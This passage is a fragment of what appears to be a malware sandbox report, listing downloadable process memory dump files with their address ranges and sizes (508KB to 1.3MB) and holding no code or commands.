Filesize
508KB

Download
memory/2292-135-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/5052-99-0x00000000073D0000-0x0000000007528000-memory.dmp

Filesize
1.3MB

Download
memory/5052-100-0x00000000075D0000-0x000000000766C000-memory.dmp

Filesize
624KB

Download